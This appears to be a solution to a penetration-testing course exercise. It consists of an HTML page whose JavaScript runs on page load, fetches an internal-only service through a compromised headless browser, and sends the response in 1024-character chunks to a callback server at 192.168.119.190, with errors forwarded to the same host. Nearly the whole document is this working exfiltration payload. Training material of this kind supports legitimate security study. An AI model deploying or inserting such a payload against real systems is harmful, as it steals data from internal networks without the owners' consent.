13.6.1
Modify the JavaScript function to avoid data truncation by sending the data in multiple requests if the data is longer than 1024 characters.
Solution
- Truncation using slice and maths
<html>
<head>
<script>
// exfiltrate function fetches internal port not accessible externally
// and then exfiltrates response text data
// this works if an internal headless chrome is compromised
// truncateString splits response to 1024 byte segments
function truncateString(str, num, ins) {
if (str.length <= num) {
return str
}
return str.slice((1024 * ins), (1024 * (ins + 1)))
}
function exfiltrate() {
fetch("http://172.16.16.2:8001")
.then((response) => response.text())
.then((data) => {
resp = data;
s_len = 1024;
loop_ins = Math.floor(resp.length / s_len)
for (let i = 0; i <= loop_ins; i++) {
t_data = truncateString(resp, s_len, i);
fetch("http://192.168.119.190/callback?" + encodeURIComponent(t_data));
}
}).catch(err => {
fetch("http://192.168.119.190/error?" + encodeURIComponent(err));
});
}
</script>
</head>
<body onload='exfiltrate()'>
<div></div>
</body>
</html>